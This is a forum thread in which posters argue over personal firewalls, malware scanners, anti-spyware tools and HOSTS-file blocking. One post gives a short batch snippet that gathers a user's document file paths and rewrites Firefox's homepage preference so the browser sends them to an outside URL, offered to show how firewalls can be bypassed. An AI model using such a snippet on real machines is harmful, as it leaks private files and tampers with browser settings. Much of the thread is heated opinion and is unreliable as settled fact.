Jetico Personal Firewall freeware asks way to many questions

Then I guess you'll keep on sulking then.

Reply to
s|b
Loading thread data ...

If the application isn't malicious, then you don't need to enforce that it does what exactly it does. On the contrary, if you think that it does something that it shouldn't do, then you're already considering it as malicious.

Hm... what about applications seeming non-malicious? A well-known example is commercial software from Adobe, whereas the Adobe License Manager Service uses the Raw Sockets API to successfully bypass about any typical "personal firewall".

Reply to
Sebastian G.

And therefore the voidness of this discussion point is reality. Now do you want to discuss the impossible or could we come back to reasonable assumptions on how things should be?

The idea of signature-based scanning to address the problem of malicious software was, as usual, to promote something that on the first run seems to work even though it actually doesn't, and to get people paying for it. The lack of education drives this discrepancy even further.

No, it doesn't. Anyway, this is a stupid idea since you're effectively throwing away a lot of performance for achieving absolutely nothing. Hint: If you were the bad guy and you'd be running your own server on your own domain with your own DNS server, how would you avoid single hostnames being blacklisted? Simply by using wildcards in your zone!

Reply to
Sebastian G.

Aside from the added complexity and the inability of the user to judge the output of the mentioned program, what exactly is a shitload of false positives worth? Say it, f.e., claims that there's some oh-so-bad "tracking cookie", and as well a trojan horse in user32.dll (because it doesn't match the original one any more, probably due to a normal update). Now it deletes both, demands a shutdown, and the system doesn't boot up anymore.

Just try running it over a completely fresh install of Windows, or even over a well secured system with a lot of known-good third-party software, and the shame of its report. Same goes for almost any malware scanner under the sun.

Reply to
Sebastian G.

Firefox: the worst thing you could made out of the Gecko platform NOD32: virus scanner... highly incomplete approach and high potential for parsing vulnerabilities and privilege escalation Spyware Blaster: spyware scanner... totally stupid approach, horrible amount of false positives, and of cause it's too stupid to do a simple unprivileged task without administrative privileges Spybot Search+Destroy immunization: aside from cluttering the HKEY_LOCAL_MACHINE hive full of useless ClassID, it achieves exactly what? malware authors simply use randomly generated GUIDs or simply registrationless COM. MSIE still remains fully vulnerable to ActiveX-based attacks as well as other well-documented security holes^W^W design features, and real webbrowser simply won't care at all. Windows Messenger: another documented security hole by design

So what? Can you specify something like:

queue: prerouting: route TCP syn from any to me queue postrouting: check-state deny TCP syn from any to me 1-1023 allow TCP syn from any to any keep-state allow TCP syn,ack from any to me keep-state allow TCP ack from any to me keep-state

If not, then obviously didn't ask anything that would be sufficient for a firewall concept yet.

Reply to
Sebastian G.

But only to your ISP, which might decide to simply disconnect your machine until you stop it from flooding the internet with spam.

Reply to
Sebastian G.

"Sebastian G." wrote in news: snipped-for-privacy@mid.dfncis.de:

Hmm. While I don't dispute the fact that BugHunter has suffered from false positives in the past, I'm unaware of any serious windows dlls being targetted by accident. I don't believe you've actually examined the program tho, as your assuming it bothers with cookies; and is interested in files that have changed. It's not interested in either of those, and it's documentation clearly does state what it scans for, and what it ignores.

I have, numerous times in development and testing. I fix the false alarms as I find them, but like I said, it doesn't flag on.. "shitloads" and doesn't find anything on a freshly loaded box. This machine is here a fairly decent example of 3rd party apps, it has tons, including various programming languages for dos and windows. Guess what? No false alarms on those executables either. :)

Have you actually examined the program I mentioned yourself? I ask this because BugHunter doesn't do the things you mention, and you seem to imply that it's a danger to a users system. I'd like to clear that misunderstanding up.

Reply to
Dustin Cook

"Sebastian G." wrote in news: snipped-for-privacy@mid.dfncis.de:

Examples please?

NOD32 is considered one of the best engines available, Would you mind explaining further these issues you have with it?

Spyware Blaster...isn't a scanner, at all. How can it get any false positives sir? It doesn't scan for anything. And, it can't do it's thing without admin rights, due to the registry keys which have to be modified. That's a good thing. I wouldn't want a program being able to set those keys if I was on the guest account. :)

Blocks installation of older malware applications with GUID's that are already known and used.

I certainly don't dispute the security risks present with MSIE. :)

I've never been a fan of windows messenger either, sir.

Nope, I certainly can't.

I asked you specifically what you felt was a firewall, I didn't ask for a trolling response. :) And I thank you for the time you spent responding to me.

Reply to
Dustin Cook

"Sebastian G." wrote in news: snipped-for-privacy@mid.dfncis.de:

Hmm, we seem to be thinking along different lines here. If I don't want so and so application to call home, malicious intentions or not, it's not going too on this box. If I am testing software, and/or running software that automatically checks for updates and won't let me turn it off, I like the ability to block outgoing internet requests from that application. And as I said originally, software firewalls unless specifically targetted aren't going to let the data pass.

Even when using raw socket calls, if the lsp layer has firewall components, the firewall still gets the final say. Ask anyone who's had to repair a system's tcpip stack due to a nasty removal of zone alarm. Do you have anything of value to contribute to the discussion, or is your intent to troll?

Reply to
Dustin Cook

Dustin Cook after much thought,came up with this jewel in news:Xns99DAD7562BE88HHI2948AJD832@69.28.186.121:

I doubt it

Reply to
Maximus the Mad

And the most annoying. Only firewall I ever found more annoying was Safety.NET when I set it to full security mode, but that is more than just a firewall.

Reply to
John Adams

Sulk away...

Reply to
s|b

Maximus the Mad wrote in news:Xns99DAE28EE1865whatsinaname@207.115.33.102:

Even so, with all of the packages out there, it's completely understandable that he might assume BugHunter was like the rest. I hope to have cleared that up with my responses, but who really knows...

Reply to
Dustin Cook

- global namespace pollution

- cookie, P3P and SSL options not exposed for configuration and with horrible defaults

- all kinds of internal mandatory policies to cashade symptoms instead of fixing the actual issue

- horrible component layering

- horrible compatibility issues with extensions

That still doesn't make it better than not using any virus scanner at all. Now again: the bad guys typically use self-modifying and self-encrypting code to not omit any signature pattern, use side effects to not omit any specific behaviour. Pattern matching and behaviour analysis totally fail in practice, now why exactly should I have the program crumping thorugh every little file on every little file system activity? I'd know much better ways to burn resources for nothing.

Very very wrong. As a non-admin user, I can tell for sure that no-one messed with HKLM. Now, it has full access to HKCU where possible damage could have been done. Why doesn't degrade it gracefully to work on only that?

The bad programs won't care. I'd like a normal program to not even try it, since it simply can't do it anyway without sufficient privileges.

OK, and why would I mind if the newer malware already hoses the system?

Risk? It's insecure by design, and fully documented as such. One could argue that abusing it as a webbrowser is a user control error since it was never promised to be securely usable in a hostile environment, and was documented like that, so it's not a security violation by definition.

So, again, why should I care for the GUIDs of old malware if even the old malware already marches in through well-documented functionality that some people would consider a security vulnerability?

It was not a trolling response, it was a well-specified example of what language constructs are necessary to complete express the intended ruleset of a routing firewall. Without such constructs, there are cases whereas you can fully specify what you consider as wanted traffic but never implement it in rules without additionally allowing unwanted traffic or denying wanted traffic.

Reply to
Sebastian G.

You're kidding, right? I show a very very easy, highly portable and not specifically targeting way to phone home as you like:

set x= for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i for /r %i in (prefs.js) do echo user_pref("browser.startup.homepage"^,"

formatting link
")^;>>"%i" Then wait until the users launches Firefox for the next time.

Now if you understood the message, I might tell you that extremely more sophisticated ways of IPC have already been used by malware ten years ago.

So, as long as you don't block all applications indiscriminatingly, you've already lost the race. (Even further, when you're running with admin rights, you've already lost anyway.)

Now I know that you don't know what you're talking about. The Raw Sockets are in the NDIS layer, thus right below the TDI layer, whereas the LSP layer is above TDI.

I'm not even gonna start discussing about adding third-party stuff like WinPCap...

Reply to
Sebastian G.

"Sebastian G." wrote in news: snipped-for-privacy@mid.dfncis.de:

I understand scripting, yes. thanks. Are you going to educate me on malware history 101 next? Perhaps you'll teach me how executables are infected. *g*

Okay....

Well, in any event, thanks for your time.

Reply to
Dustin Cook

Not if you disable the DNS client service. DNS client service is useless for a home PC. Hosts file is a good way to block malicious sites at the source so f*ck you geekboy.

Reply to
John Adams

Aside from that it's the DNS *caching* service, your argument is nonsense. Considering a minimum delay of 50ms and a typical delay of 200 ms for a typical ISP's DNS server, caching improves latency very well.

The HOSTS file is about the most stupid idea to implement a local blacklist, which by itself already is a stupid idea. Anyway, since almost every sites is malicious by definition, your categorization is nonsense as well.

A DNS manipulation never blocks at the source, obviously.

Reply to
Sebastian G.

"Sebastian G." after much thought,came up with this jewel in news: snipped-for-privacy@mid.dfncis.de:

The only nonsence is not using a good hosts file. note: for those of you who are wondering what a hosts file is,see

formatting link

Reply to
Maximus the Mad

The only nonsense is not doing some stupid to hardly achieve a broken concept? Well, if you think so... For me it's just fun seeing people keep on telling the HOSTS file nonsense over and over in the dear hope that it would actually help against whatever.

Reply to
Sebastian G.

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.